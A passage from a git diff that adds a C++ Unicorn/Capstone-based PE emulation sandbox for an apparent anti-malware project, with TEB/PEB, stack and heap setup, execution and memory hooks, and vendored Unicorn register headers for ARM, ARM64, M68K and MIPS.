uc_mem_write(m_ucEngine, m_tebBase, &m_teb32, sizeof(X32TEB)); + + // 对于32位,我们需要设置FS段寄存器指向TEB + SegmentSelector fs = {0}; + fs.fields.index = 3; + uc_reg_write(m_ucEngine, UC_X86_REG_FS, &fs.all); + + // 设置FS基址MSR + uc_x86_msr msr; + msr.rid = static_cast(Msr::kIa32FsBase); + msr.value = m_tebBase; + uc_reg_write(m_ucEngine, UC_X86_REG_MSR, &msr); + } +} +auto Sandbox::InitEnv(std::shared_ptr peInfo) -> void { + m_peInfo = peInfo; + + if (cs_open(CS_ARCH_X86, peInfo->isX64 ? CS_MODE_64 : CS_MODE_32, + &m_csHandle) != CS_ERR_OK) { + throw std::runtime_error("Failed to initialize Capstone"); + } + if (uc_open(UC_ARCH_X86, peInfo->isX64 ? UC_MODE_64 : UC_MODE_32, + &m_ucEngine) != UC_ERR_OK) { + cs_close(&m_csHandle); // 清理已分配的capstone资源 + throw std::runtime_error("Failed to initialize Unicorn"); + } + ResoveImport(); + ResolveExport(); + uc_err ucErr = uc_mem_map(m_ucEngine, m_peInfo->RecImageBase, + m_peInfo->peSize, UC_PROT_ALL); + if (ucErr != UC_ERR_OK) { + throw std::runtime_error("Failed to map memory"); + } + uc_mem_write(m_ucEngine, m_peInfo->RecImageBase, m_peInfo->peBuffer, + m_peInfo->peSize); + printf("map file to vm file: %llx\n", m_peInfo->RecImageBase); + printf("map file to vm size: %llx\n", m_peInfo->peSize); + SetupVirtualMachine(); +} + +auto Sandbox::Run() -> void { + // 初始化堆栈 + uc_err err = uc_mem_map(m_ucEngine, m_stackBase, m_stackSize, + UC_PROT_READ | UC_PROT_WRITE); + if (err != UC_ERR_OK) { + throw std::runtime_error("Failed to map stack memory"); + } + + // 初始化堆 + err = uc_mem_map(m_ucEngine, m_heapBase, m_heapSize, + UC_PROT_READ | UC_PROT_WRITE); + if (err != UC_ERR_OK) { + throw std::runtime_error("Failed to map heap memory"); + } + + // 设置寄存器 + uint64_t rsp = m_stackEnd - 128; + err = uc_reg_write(m_ucEngine, + m_peInfo->isX64 ? UC_X86_REG_RSP : UC_X86_REG_ESP, &rsp); + if (err != UC_ERR_OK) { + throw std::runtime_error("Failed to write stack pointer"); + } + + // 设置入口点 + uint64_t entryPoint = m_peInfo->RecImageBase + m_peInfo->entryPoint; + + // 添加钩子 + uc_hook hook_code, hook_mem, hook_mem_unmap, hook_mem_write, hook_syscall; + + // 代码执行钩子 + err = uc_hook_add(m_ucEngine, &hook_code, UC_HOOK_CODE, + reinterpret_cast(sandboxCallbacks::handleCodeRun), + this, 1, 0); + if (err != UC_ERR_OK) { + throw std::runtime_error("Failed to add code hook"); + } + + // 内存读取钩子 + err = + uc_hook_add(m_ucEngine, &hook_mem, UC_HOOK_MEM_READ | UC_HOOK_MEM_FETCH, + reinterpret_cast(sandboxCallbacks::handleMemoryRead), + this, 1, 0); + if (err != UC_ERR_OK) { + throw std::runtime_error("Failed to add memory read hook"); + } + + // 未映射内存访问钩子 + err = uc_hook_add( + m_ucEngine, &hook_mem_unmap, + UC_HOOK_MEM_FETCH_UNMAPPED | UC_HOOK_MEM_READ_UNMAPPED | + UC_HOOK_MEM_WRITE_UNMAPPED | UC_HOOK_MEM_FETCH_PROT, + reinterpret_cast(sandboxCallbacks::handleMemoryUnmapRead), this, + 1, 0); + if (err != UC_ERR_OK) { + throw std::runtime_error("Failed to add unmapped memory hook"); + } + + // 内存写入钩子 + err = uc_hook_add( + m_ucEngine, &hook_mem_write, UC_HOOK_MEM_WRITE | UC_HOOK_MEM_WRITE_PROT, + reinterpret_cast(sandboxCallbacks::handleMemoryWrite), this, 1, + 0); + if (err != UC_ERR_OK) { + throw std::runtime_error("Failed to add memory write hook"); + } + + // 系统调用钩子 + err = uc_hook_add(m_ucEngine, &hook_syscall, UC_HOOK_INTR | UC_HOOK_INSN, + reinterpret_cast(sandboxCallbacks::handleSyscall), + this, 1, 0, UC_X86_INS_SYSCALL); + if (err != UC_ERR_OK) { + throw std::runtime_error("Failed to add syscall hook"); + } + + // 设置EIP/RIP + err = uc_reg_write(m_ucEngine, + m_peInfo->isX64 ? UC_X86_REG_RIP : UC_X86_REG_EIP, + &entryPoint); + if (err != UC_ERR_OK) { + throw std::runtime_error("Failed to set entry point"); + } + + // 开始执行 + std::cout << "Starting execution at " << std::hex << entryPoint + << std::endl; + err = uc_emu_start(m_ucEngine, entryPoint, m_peInfo->imageEnd, 0, 0); + if (err != UC_ERR_OK) { + std::cerr << "Emulation error: " << uc_strerror(err) << std::endl; + + // 32位环境下的错误处理 + if (!m_peInfo->isX64) { + uint32_t eip; + uc_reg_read(m_ucEngine, UC_X86_REG_EIP, &eip); + std::cerr << "Error occurred at EIP: 0x" << std::hex << eip + << std::endl; + + // 尝试读取当前指令 + uint8_t instruction[16]; + if (uc_mem_read(m_ucEngine, eip, instruction, + sizeof(instruction)) == UC_ERR_OK) { + std::cerr << "Instruction bytes: "; + for (int i = 0; i < 16; i++) { + printf("%02X ", instruction[i]); + } + std::cerr << std::endl; + } + } + } +} diff --git a/ai_anti_malware/sandbox.h b/ai_anti_malware/sandbox.h new file mode 100644 index 0000000..823d3d0 --- /dev/null +++ b/ai_anti_malware/sandbox.h @@ -0,0 +1,94 @@ +#pragma once +#include "head.h" + +#define PAGE_SIZE 0x1000 +#define CF_MASK (1 << 0) +#define PF_MASK (1 << 2) +#define ZF_MASK (1 << 6) +#define SF_MASK (1 << 7) +#define OF_MASK (1 << 11) +#define ALL_MASK (OF_MASK | SF_MASK | ZF_MASK | PF_MASK | CF_MASK) +#define STACK_BASE_64 0x7ffffffde000 +#define STACK_BASE_32 0xfffdd000 +#define STACK_SIZE_64 0x40000 +#define STACK_SIZE_32 0x21000 +#define HEAP_ADDRESS_64 0x500000000 +#define HEAP_SIZE_64 0x5000000 +#define HEAP_ADDRESS_32 0x5000000 +#define HEAP_SIZE_32 0x5000000 + +#define PEB_BASE 0x80000 +#define TEB_BASE 0x90000 + +#define X86_GDT_ADDR 0x30000 +#define X86_GDT_LIMIT 0x1000 +#define X86_GDT_ENTRY_SIZE 0x8 + +#define API_FUNCTION_SIZE 8 +#define PAGE_ALIGN(Va) (ULONG_PTR)(Va) & ~(PAGE_SIZE - 1) +#define PAGE_ALIGN_64(Va) (Va) & ~(0x1000ull - 1) +#define PAGE_ALIGN_64k(Va) ((Va)) & ~(0x10000ull - 1) +#define AlignSize(Size, Align) (Size + Align - 1) / Align* Align + +enum class WinVer { + kWin7 = 0x0610, + kWin7SP1 = 0x0611, + kWin8 = 0x0620, + kWin81 = 0x0630, + kWin10 = 0x0A00, + kWin10RS1 = 0x0A01, // Anniversary update + kWin10RS2 = 0x0A02, // Creators update + kWin10RS3 = 0x0A03, // Fall creators update + kWin10RS4 = 0x0A04, // Spring creators update + kWin10RS5 = 0x0A05, // October 2018 update + kWin1019H1 = 0x0A06, // May 2019 update 19H1 + kWin1019H2 = 0x0A07, // November 2019 update 19H2 + kWin1020H1 = 0x0A08 // April 2020 update 20H1 +}; + +class Sandbox { + public: + Sandbox(); + ~Sandbox(); + + // Public methods + auto InitEnv(std::shared_ptr peInfo) -> void; + + auto Run() -> void; + + auto GetCapstoneHandle() const -> csh { return m_csHandle; } + auto GetUnicornHandle() const -> uc_engine* { return m_ucEngine; } + auto GetPeInfo() const -> std::shared_ptr { return m_peInfo; } + + private: + std::shared_ptr m_peInfo; + uint64_t m_gsBase; + uint64_t m_pebBase; + uint64_t m_pebEnd; + uint64_t m_tebBase; + uint64_t m_tebEnd; + PVOID m_stackBuffer; // 没有释放 + uint64_t m_stackBase; + uint64_t m_stackSize; + uint64_t m_stackEnd; + uint64_t m_heapBase; + uint64_t m_heapSize; + uint64_t m_heapEnd; + uint64_t m_fakeBase; + struct_gs_base m_gsBaseStruct; + X64TEB m_teb64; + X64PEB m_peb64; + X32TEB m_teb32; + X32PEB m_peb32; + csh m_csHandle; // Capstone handle + uc_engine* m_ucEngine; // Unicorn engine handle + std::vector> m_impFuncDict; + std::vector> m_exportFuncDict; + std::vector> m_moduleList; + auto ResoveImport() -> void; + auto SetupVirtualMachine() -> void; + auto ResolveExport() -> void; + auto PushModuleToVM(const char* dllName, uint64_t moduleBase, + uint32_t x32Base) -> void; + auto processImportModule(const moudle_import* importModule) -> void; +}; diff --git a/ai_anti_malware/sandbox_callbacks.cpp b/ai_anti_malware/sandbox_callbacks.cpp new file mode 100644 index 0000000..fe45d2b --- /dev/null +++ b/ai_anti_malware/sandbox_callbacks.cpp @@ -0,0 +1 @@ +#include "sandbox_callbacks.h" diff --git a/ai_anti_malware/sandbox_callbacks.h b/ai_anti_malware/sandbox_callbacks.h new file mode 100644 index 0000000..153ce60 --- /dev/null +++ b/ai_anti_malware/sandbox_callbacks.h @@ -0,0 +1,70 @@ +#pragma once +#include "sandbox.h" + +namespace sandboxCallbacks { +static void handleCodeRun(uc_engine* uc, uint64_t address, uint32_t size, + void* userData) { + auto* sandbox = static_cast(userData); + if (!sandbox) return; + + // 读取当前执行的代码 + uint8_t* codeBuffer = new uint8_t[size]; + if (uc_mem_read(uc, address, codeBuffer, size) != UC_ERR_OK) { + delete[] codeBuffer; + return; + } + + // 使用Capstone反汇编 + cs_insn* instruction; + size_t instructionCount = + cs_disasm(sandbox->GetCapstoneHandle(), codeBuffer, size, address, 0, + &instruction); + + if (instructionCount > 0) { + // 打印地址和反汇编结果 + printf("0x%016" PRIx64 " %-12s %s\n", instruction[0].address, + instruction[0].mnemonic, instruction[0].op_str); + cs_free(instruction, instructionCount); + } + + delete[] codeBuffer; +} + +static void handleMemoryRead(uc_engine* uc, uc_mem_type type, uint64_t address, + int size, int64_t value, void* userData) { + auto* sandbox = static_cast(userData); + if (!sandbox) return; + + uint64_t regRax, regRip; + uc_reg_read(uc, + sandbox->GetPeInfo()->isX64 ? UC_X86_REG_RAX : UC_X86_REG_EAX, + ®Rax); + uc_reg_read(uc, + sandbox->GetPeInfo()->isX64 ? UC_X86_REG_RIP : UC_X86_REG_EIP, + ®Rip); + + uint64_t readAddress; + auto readError = + uc_mem_read(sandbox->GetUnicornHandle(), address, &readAddress, size); + printf( + "[handleMemoryRead] Address: %p Size: %p Rax: %p Rip: %p Error: %d " + "ReadData: %p\n", + address, size, regRax, regRip, readError, readAddress); +} + +static void handleMemoryUnmapRead(uc_engine* uc, uc_mem_type type, + uint64_t address, int size, int64_t value, + void* userData) { + // 待实现 +} + +static void handleMemoryWrite(uc_engine* uc, uc_mem_type type, uint64_t address, + int size, int64_t value, void* userData) { + // 待实现 +} + +static void handleSyscall(uc_engine* uc, void* userData) { + // 待实现 +} + +} // namespace sandboxCallbacks diff --git a/ai_anti_malware/unicorn/include/unicorn/arm.h b/ai_anti_malware/unicorn/include/unicorn/arm.h new file mode 100644 index 0000000..a0fd83e --- /dev/null +++ b/ai_anti_malware/unicorn/include/unicorn/arm.h @@ -0,0 +1,157 @@ +/* Unicorn Engine */ +/* By Nguyen Anh Quynh , 2015-2017 */ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_ARM_H +#define UNICORN_ARM_H + +#ifdef __cplusplus +extern "C" { +#endif + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +//> ARM registers +typedef enum uc_arm_reg { + UC_ARM_REG_INVALID = 0, + UC_ARM_REG_APSR, + UC_ARM_REG_APSR_NZCV, + UC_ARM_REG_CPSR, + UC_ARM_REG_FPEXC, + UC_ARM_REG_FPINST, + UC_ARM_REG_FPSCR, + UC_ARM_REG_FPSCR_NZCV, + UC_ARM_REG_FPSID, + UC_ARM_REG_ITSTATE, + UC_ARM_REG_LR, + UC_ARM_REG_PC, + UC_ARM_REG_SP, + UC_ARM_REG_SPSR, + UC_ARM_REG_D0, + UC_ARM_REG_D1, + UC_ARM_REG_D2, + UC_ARM_REG_D3, + UC_ARM_REG_D4, + UC_ARM_REG_D5, + UC_ARM_REG_D6, + UC_ARM_REG_D7, + UC_ARM_REG_D8, + UC_ARM_REG_D9, + UC_ARM_REG_D10, + UC_ARM_REG_D11, + UC_ARM_REG_D12, + UC_ARM_REG_D13, + UC_ARM_REG_D14, + UC_ARM_REG_D15, + UC_ARM_REG_D16, + UC_ARM_REG_D17, + UC_ARM_REG_D18, + UC_ARM_REG_D19, + UC_ARM_REG_D20, + UC_ARM_REG_D21, + UC_ARM_REG_D22, + UC_ARM_REG_D23, + UC_ARM_REG_D24, + UC_ARM_REG_D25, + UC_ARM_REG_D26, + UC_ARM_REG_D27, + UC_ARM_REG_D28, + UC_ARM_REG_D29, + UC_ARM_REG_D30, + UC_ARM_REG_D31, + UC_ARM_REG_FPINST2, + UC_ARM_REG_MVFR0, + UC_ARM_REG_MVFR1, + UC_ARM_REG_MVFR2, + UC_ARM_REG_Q0, + UC_ARM_REG_Q1, + UC_ARM_REG_Q2, + UC_ARM_REG_Q3, + UC_ARM_REG_Q4, + UC_ARM_REG_Q5, + UC_ARM_REG_Q6, + UC_ARM_REG_Q7, + UC_ARM_REG_Q8, + UC_ARM_REG_Q9, + UC_ARM_REG_Q10, + UC_ARM_REG_Q11, + UC_ARM_REG_Q12, + UC_ARM_REG_Q13, + UC_ARM_REG_Q14, + UC_ARM_REG_Q15, + UC_ARM_REG_R0, + UC_ARM_REG_R1, + UC_ARM_REG_R2, + UC_ARM_REG_R3, + UC_ARM_REG_R4, + UC_ARM_REG_R5, + UC_ARM_REG_R6, + UC_ARM_REG_R7, + UC_ARM_REG_R8, + UC_ARM_REG_R9, + UC_ARM_REG_R10, + UC_ARM_REG_R11, + UC_ARM_REG_R12, + UC_ARM_REG_S0, + UC_ARM_REG_S1, + UC_ARM_REG_S2, + UC_ARM_REG_S3, + UC_ARM_REG_S4, + UC_ARM_REG_S5, + UC_ARM_REG_S6, + UC_ARM_REG_S7, + UC_ARM_REG_S8, + UC_ARM_REG_S9, + UC_ARM_REG_S10, + UC_ARM_REG_S11, + UC_ARM_REG_S12, + UC_ARM_REG_S13, + UC_ARM_REG_S14, + UC_ARM_REG_S15, + UC_ARM_REG_S16, + UC_ARM_REG_S17, + UC_ARM_REG_S18, + UC_ARM_REG_S19, + UC_ARM_REG_S20, + UC_ARM_REG_S21, + UC_ARM_REG_S22, + UC_ARM_REG_S23, + UC_ARM_REG_S24, + UC_ARM_REG_S25, + UC_ARM_REG_S26, + UC_ARM_REG_S27, + UC_ARM_REG_S28, + UC_ARM_REG_S29, + UC_ARM_REG_S30, + UC_ARM_REG_S31, + + UC_ARM_REG_C1_C0_2, + UC_ARM_REG_C13_C0_2, + UC_ARM_REG_C13_C0_3, + + UC_ARM_REG_IPSR, + UC_ARM_REG_MSP, + UC_ARM_REG_PSP, + UC_ARM_REG_CONTROL, + UC_ARM_REG_ENDING, // <-- mark the end of the list or registers + + //> alias registers + UC_ARM_REG_R13 = UC_ARM_REG_SP, + UC_ARM_REG_R14 = UC_ARM_REG_LR, + UC_ARM_REG_R15 = UC_ARM_REG_PC, + + UC_ARM_REG_SB = UC_ARM_REG_R9, + UC_ARM_REG_SL = UC_ARM_REG_R10, + UC_ARM_REG_FP = UC_ARM_REG_R11, + UC_ARM_REG_IP = UC_ARM_REG_R12, +} uc_arm_reg; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/include/unicorn/arm64.h b/ai_anti_malware/unicorn/include/unicorn/arm64.h new file mode 100644 index 0000000..0f66518 --- /dev/null +++ b/ai_anti_malware/unicorn/include/unicorn/arm64.h @@ -0,0 +1,344 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015-2017 */ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_ARM64_H +#define UNICORN_ARM64_H + +#ifdef __cplusplus +extern "C" { +#endif + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +//> ARM64 registers +typedef enum uc_arm64_reg { + UC_ARM64_REG_INVALID = 0, + + UC_ARM64_REG_X29, + UC_ARM64_REG_X30, + UC_ARM64_REG_NZCV, + UC_ARM64_REG_SP, + UC_ARM64_REG_WSP, + UC_ARM64_REG_WZR, + UC_ARM64_REG_XZR, + UC_ARM64_REG_B0, + UC_ARM64_REG_B1, + UC_ARM64_REG_B2, + UC_ARM64_REG_B3, + UC_ARM64_REG_B4, + UC_ARM64_REG_B5, + UC_ARM64_REG_B6, + UC_ARM64_REG_B7, + UC_ARM64_REG_B8, + UC_ARM64_REG_B9, + UC_ARM64_REG_B10, + UC_ARM64_REG_B11, + UC_ARM64_REG_B12, + UC_ARM64_REG_B13, + UC_ARM64_REG_B14, + UC_ARM64_REG_B15, + UC_ARM64_REG_B16, + UC_ARM64_REG_B17, + UC_ARM64_REG_B18, + UC_ARM64_REG_B19, + UC_ARM64_REG_B20, + UC_ARM64_REG_B21, + UC_ARM64_REG_B22, + UC_ARM64_REG_B23, + UC_ARM64_REG_B24, + UC_ARM64_REG_B25, + UC_ARM64_REG_B26, + UC_ARM64_REG_B27, + UC_ARM64_REG_B28, + UC_ARM64_REG_B29, + UC_ARM64_REG_B30, + UC_ARM64_REG_B31, + UC_ARM64_REG_D0, + UC_ARM64_REG_D1, + UC_ARM64_REG_D2, + UC_ARM64_REG_D3, + UC_ARM64_REG_D4, + UC_ARM64_REG_D5, + UC_ARM64_REG_D6, + UC_ARM64_REG_D7, + UC_ARM64_REG_D8, + UC_ARM64_REG_D9, + UC_ARM64_REG_D10, + UC_ARM64_REG_D11, + UC_ARM64_REG_D12, + UC_ARM64_REG_D13, + UC_ARM64_REG_D14, + UC_ARM64_REG_D15, + UC_ARM64_REG_D16, + UC_ARM64_REG_D17, + UC_ARM64_REG_D18, + UC_ARM64_REG_D19, + UC_ARM64_REG_D20, + UC_ARM64_REG_D21, + UC_ARM64_REG_D22, + UC_ARM64_REG_D23, + UC_ARM64_REG_D24, + UC_ARM64_REG_D25, + UC_ARM64_REG_D26, + UC_ARM64_REG_D27, + UC_ARM64_REG_D28, + UC_ARM64_REG_D29, + UC_ARM64_REG_D30, + UC_ARM64_REG_D31, + UC_ARM64_REG_H0, + UC_ARM64_REG_H1, + UC_ARM64_REG_H2, + UC_ARM64_REG_H3, + UC_ARM64_REG_H4, + UC_ARM64_REG_H5, + UC_ARM64_REG_H6, + UC_ARM64_REG_H7, + UC_ARM64_REG_H8, + UC_ARM64_REG_H9, + UC_ARM64_REG_H10, + UC_ARM64_REG_H11, + UC_ARM64_REG_H12, + UC_ARM64_REG_H13, + UC_ARM64_REG_H14, + UC_ARM64_REG_H15, + UC_ARM64_REG_H16, + UC_ARM64_REG_H17, + UC_ARM64_REG_H18, + UC_ARM64_REG_H19, + UC_ARM64_REG_H20, + UC_ARM64_REG_H21, + UC_ARM64_REG_H22, + UC_ARM64_REG_H23, + UC_ARM64_REG_H24, + UC_ARM64_REG_H25, + UC_ARM64_REG_H26, + UC_ARM64_REG_H27, + UC_ARM64_REG_H28, + UC_ARM64_REG_H29, + UC_ARM64_REG_H30, + UC_ARM64_REG_H31, + UC_ARM64_REG_Q0, + UC_ARM64_REG_Q1, + UC_ARM64_REG_Q2, + UC_ARM64_REG_Q3, + UC_ARM64_REG_Q4, + UC_ARM64_REG_Q5, + UC_ARM64_REG_Q6, + UC_ARM64_REG_Q7, + UC_ARM64_REG_Q8, + UC_ARM64_REG_Q9, + UC_ARM64_REG_Q10, + UC_ARM64_REG_Q11, + UC_ARM64_REG_Q12, + UC_ARM64_REG_Q13, + UC_ARM64_REG_Q14, + UC_ARM64_REG_Q15, + UC_ARM64_REG_Q16, + UC_ARM64_REG_Q17, + UC_ARM64_REG_Q18, + UC_ARM64_REG_Q19, + UC_ARM64_REG_Q20, + UC_ARM64_REG_Q21, + UC_ARM64_REG_Q22, + UC_ARM64_REG_Q23, + UC_ARM64_REG_Q24, + UC_ARM64_REG_Q25, + UC_ARM64_REG_Q26, + UC_ARM64_REG_Q27, + UC_ARM64_REG_Q28, + UC_ARM64_REG_Q29, + UC_ARM64_REG_Q30, + UC_ARM64_REG_Q31, + UC_ARM64_REG_S0, + UC_ARM64_REG_S1, + UC_ARM64_REG_S2, + UC_ARM64_REG_S3, + UC_ARM64_REG_S4, + UC_ARM64_REG_S5, + UC_ARM64_REG_S6, + UC_ARM64_REG_S7, + UC_ARM64_REG_S8, + UC_ARM64_REG_S9, + UC_ARM64_REG_S10, + UC_ARM64_REG_S11, + UC_ARM64_REG_S12, + UC_ARM64_REG_S13, + UC_ARM64_REG_S14, + UC_ARM64_REG_S15, + UC_ARM64_REG_S16, + UC_ARM64_REG_S17, + UC_ARM64_REG_S18, + UC_ARM64_REG_S19, + UC_ARM64_REG_S20, + UC_ARM64_REG_S21, + UC_ARM64_REG_S22, + UC_ARM64_REG_S23, + UC_ARM64_REG_S24, + UC_ARM64_REG_S25, + UC_ARM64_REG_S26, + UC_ARM64_REG_S27, + UC_ARM64_REG_S28, + UC_ARM64_REG_S29, + UC_ARM64_REG_S30, + UC_ARM64_REG_S31, + UC_ARM64_REG_W0, + UC_ARM64_REG_W1, + UC_ARM64_REG_W2, + UC_ARM64_REG_W3, + UC_ARM64_REG_W4, + UC_ARM64_REG_W5, + UC_ARM64_REG_W6, + UC_ARM64_REG_W7, + UC_ARM64_REG_W8, + UC_ARM64_REG_W9, + UC_ARM64_REG_W10, + UC_ARM64_REG_W11, + UC_ARM64_REG_W12, + UC_ARM64_REG_W13, + UC_ARM64_REG_W14, + UC_ARM64_REG_W15, + UC_ARM64_REG_W16, + UC_ARM64_REG_W17, + UC_ARM64_REG_W18, + UC_ARM64_REG_W19, + UC_ARM64_REG_W20, + UC_ARM64_REG_W21, + UC_ARM64_REG_W22, + UC_ARM64_REG_W23, + UC_ARM64_REG_W24, + UC_ARM64_REG_W25, + UC_ARM64_REG_W26, + UC_ARM64_REG_W27, + UC_ARM64_REG_W28, + UC_ARM64_REG_W29, + UC_ARM64_REG_W30, + UC_ARM64_REG_X0, + UC_ARM64_REG_X1, + UC_ARM64_REG_X2, + UC_ARM64_REG_X3, + UC_ARM64_REG_X4, + UC_ARM64_REG_X5, + UC_ARM64_REG_X6, + UC_ARM64_REG_X7, + UC_ARM64_REG_X8, + UC_ARM64_REG_X9, + UC_ARM64_REG_X10, + UC_ARM64_REG_X11, + UC_ARM64_REG_X12, + UC_ARM64_REG_X13, + UC_ARM64_REG_X14, + UC_ARM64_REG_X15, + UC_ARM64_REG_X16, + UC_ARM64_REG_X17, + UC_ARM64_REG_X18, + UC_ARM64_REG_X19, + UC_ARM64_REG_X20, + UC_ARM64_REG_X21, + UC_ARM64_REG_X22, + UC_ARM64_REG_X23, + UC_ARM64_REG_X24, + UC_ARM64_REG_X25, + UC_ARM64_REG_X26, + UC_ARM64_REG_X27, + UC_ARM64_REG_X28, + + UC_ARM64_REG_V0, + UC_ARM64_REG_V1, + UC_ARM64_REG_V2, + UC_ARM64_REG_V3, + UC_ARM64_REG_V4, + UC_ARM64_REG_V5, + UC_ARM64_REG_V6, + UC_ARM64_REG_V7, + UC_ARM64_REG_V8, + UC_ARM64_REG_V9, + UC_ARM64_REG_V10, + UC_ARM64_REG_V11, + UC_ARM64_REG_V12, + UC_ARM64_REG_V13, + UC_ARM64_REG_V14, + UC_ARM64_REG_V15, + UC_ARM64_REG_V16, + UC_ARM64_REG_V17, + UC_ARM64_REG_V18, + UC_ARM64_REG_V19, + UC_ARM64_REG_V20, + UC_ARM64_REG_V21, + UC_ARM64_REG_V22, + UC_ARM64_REG_V23, + UC_ARM64_REG_V24, + UC_ARM64_REG_V25, + UC_ARM64_REG_V26, + UC_ARM64_REG_V27, + UC_ARM64_REG_V28, + UC_ARM64_REG_V29, + UC_ARM64_REG_V30, + UC_ARM64_REG_V31, + + //> pseudo registers + UC_ARM64_REG_PC, // program counter register + + UC_ARM64_REG_CPACR_EL1, + + //> thread registers + UC_ARM64_REG_TPIDR_EL0, + UC_ARM64_REG_TPIDRRO_EL0, + UC_ARM64_REG_TPIDR_EL1, + + UC_ARM64_REG_PSTATE, + + //> exception link registers + UC_ARM64_REG_ELR_EL0, + UC_ARM64_REG_ELR_EL1, + UC_ARM64_REG_ELR_EL2, + UC_ARM64_REG_ELR_EL3, + + //> stack pointers registers + UC_ARM64_REG_SP_EL0, + UC_ARM64_REG_SP_EL1, + UC_ARM64_REG_SP_EL2, + UC_ARM64_REG_SP_EL3, + + //> other CP15 registers + UC_ARM64_REG_TTBR0_EL1, + UC_ARM64_REG_TTBR1_EL1, + + UC_ARM64_REG_ESR_EL0, + UC_ARM64_REG_ESR_EL1, + UC_ARM64_REG_ESR_EL2, + UC_ARM64_REG_ESR_EL3, + + UC_ARM64_REG_FAR_EL0, + UC_ARM64_REG_FAR_EL1, + UC_ARM64_REG_FAR_EL2, + UC_ARM64_REG_FAR_EL3, + + UC_ARM64_REG_PAR_EL1, + + UC_ARM64_REG_MAIR_EL1, + + UC_ARM64_REG_VBAR_EL0, + UC_ARM64_REG_VBAR_EL1, + UC_ARM64_REG_VBAR_EL2, + UC_ARM64_REG_VBAR_EL3, + + UC_ARM64_REG_ENDING, // <-- mark the end of the list of registers + + //> alias registers + + UC_ARM64_REG_IP0 = UC_ARM64_REG_X16, + UC_ARM64_REG_IP1 = UC_ARM64_REG_X17, + UC_ARM64_REG_FP = UC_ARM64_REG_X29, + UC_ARM64_REG_LR = UC_ARM64_REG_X30, +} uc_arm64_reg; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/include/unicorn/m68k.h b/ai_anti_malware/unicorn/include/unicorn/m68k.h new file mode 100644 index 0000000..80e8b92 --- /dev/null +++ b/ai_anti_malware/unicorn/include/unicorn/m68k.h @@ -0,0 +1,50 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2014-2017 */ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_M68K_H +#define UNICORN_M68K_H + +#ifdef __cplusplus +extern "C" { +#endif + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +//> M68K registers +typedef enum uc_m68k_reg { + UC_M68K_REG_INVALID = 0, + + UC_M68K_REG_A0, + UC_M68K_REG_A1, + UC_M68K_REG_A2, + UC_M68K_REG_A3, + UC_M68K_REG_A4, + UC_M68K_REG_A5, + UC_M68K_REG_A6, + UC_M68K_REG_A7, + + UC_M68K_REG_D0, + UC_M68K_REG_D1, + UC_M68K_REG_D2, + UC_M68K_REG_D3, + UC_M68K_REG_D4, + UC_M68K_REG_D5, + UC_M68K_REG_D6, + UC_M68K_REG_D7, + + UC_M68K_REG_SR, + UC_M68K_REG_PC, + + UC_M68K_REG_ENDING, // <-- mark the end of the list of registers +} uc_m68k_reg; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/include/unicorn/mips.h b/ai_anti_malware/unicorn/include/unicorn/mips.h new file mode 100644 index 0000000..77fde3c --- /dev/null +++ b/ai_anti_malware/unicorn/include/unicorn/mips.h @@ -0,0 +1,232 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015-2017 */ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_MIPS_H +#define UNICORN_MIPS_H + +#ifdef __cplusplus +extern "C" { +#endif + +// GCC MIPS toolchain has a default macro called "mips" which breaks +// compilation +#undef mips + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +//> MIPS registers +typedef enum UC_MIPS_REG { + UC_MIPS_REG_INVALID = 0, + //> General purpose registers + UC_MIPS_REG_PC, + + UC_MIPS_REG_0, + UC_MIPS_REG_1, + UC_MIPS_REG_2, + UC_MIPS_REG_3, + UC_MIPS_REG_4, + UC_MIPS_REG_5, + UC_MIPS_REG_6, + UC_MIPS_REG_7, + UC_MIPS_REG_8, + UC_MIPS_REG_9, + UC_MIPS_REG_10, + UC_MIPS_REG_11, + UC_MIPS_REG_12, + UC_MIPS_REG_13, + UC_MIPS_REG_14, + UC_MIPS_REG_15, + UC_MIPS_REG_16, + UC_MIPS_REG_17, + UC_MIPS_REG_18, + UC_MIPS_REG_19, + UC_MIPS_REG_20, + UC_MIPS_REG_21, + UC_MIPS_REG_22, + UC_MIPS_REG_23, + UC_MIPS_REG_24, + UC_MIPS_REG_25, + UC_MIPS_REG_26, + UC_MIPS_REG_27, + UC_MIPS_REG_28, + UC_MIPS_REG_29, + UC_MIPS_REG_30, + UC_MIPS_REG_31, + + //> DSP registers + UC_MIPS_REG_DSPCCOND, + UC_MIPS_REG_DSPCARRY, + UC_MIPS_REG_DSPEFI, + UC_MIPS_REG_DSPOUTFLAG, + UC_MIPS_REG_DSPOUTFLAG16_19, + UC_MIPS_REG_DSPOUTFLAG20, + UC_MIPS_REG_DSPOUTFLAG21, + UC_MIPS_REG_DSPOUTFLAG22, + UC_MIPS_REG_DSPOUTFLAG23, + UC_MIPS_REG_DSPPOS, + UC_MIPS_REG_DSPSCOUNT, + + //> ACC registers + UC_MIPS_REG_AC0, + UC_MIPS_REG_AC1, + UC_MIPS_REG_AC2, + UC_MIPS_REG_AC3, + + //> COP registers + UC_MIPS_REG_CC0, + UC_MIPS_REG_CC1, + UC_MIPS_REG_CC2, + UC_MIPS_REG_CC3, + UC_MIPS_REG_CC4, + UC_MIPS_REG_CC5, + UC_MIPS_REG_CC6, + UC_MIPS_REG_CC7, + + //> FPU registers + UC_MIPS_REG_F0, + UC_MIPS_REG_F1, + UC_MIPS_REG_F2, + UC_MIPS_REG_F3, + UC_MIPS_REG_F4, + UC_MIPS_REG_F5, + UC_MIPS_REG_F6, + UC_MIPS_REG_F7, + UC_MIPS_REG_F8, + UC_MIPS_REG_F9, + 